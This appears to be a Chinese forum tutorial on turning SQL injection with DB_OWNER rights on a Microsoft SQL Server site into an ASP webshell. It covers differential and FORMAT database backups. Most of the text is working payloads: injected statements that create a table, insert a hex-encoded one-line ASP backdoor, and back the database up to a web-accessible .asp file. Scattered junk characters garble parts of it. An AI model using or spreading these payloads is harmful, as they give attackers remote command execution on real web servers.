DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
2 j6 ^" ^6 I  b; Y$ ~加一个参数WITH DIFFERENTIAL
8 p9 m- j4 }1 s! ]% ~
1 G) H; g8 M) k/ A9 ~1
; q! ~6 g& _7 p2
: y3 g. x3 d6 p: @3
4 f7 V- s2 M" U7 Q' J0 ]4
  V2 D6 Y$ Z4 C: V2 i: B" e' h& |+ Q declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
4 }8 ~* |" _5 b9 X! b; `; K6 j. ycreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
0 @- z" D: M: g/ d加一个参数WITH FROMAT
1 C* [) ^  L' O$ i1 ~有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
, Z/ Y6 t& E) G% a. d& Y- L: F, E
2 Q' L. F  T) [3 n6 f1
2
6 A) O+ O8 I# Y4 b/ ~8 u" |3
! C# z, C+ X4 c: ]4
1 l6 s5 p) m1 K) }, {* w. m declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
* L/ H; i  e, x( H7 Zinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
+ b9 ^8 C7 S, J
总的来说就是那么简单几句,下面以备份数据库model为例子
$ R( Z0 a1 s7 f( I: F  F6 E1
) x- `5 B4 b3 |- O3 T
" ?8 n8 ?* z0 @; O1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
1 G: Q. x$ ?" U
2
  U7 m, |- {" B) c, m! h& M% u6 V
1
id=1;backup database model to disk='你的路径‘ with differential,format;--
4 r( m3 K8 i) @2 S: \5 G1 ]7 x# I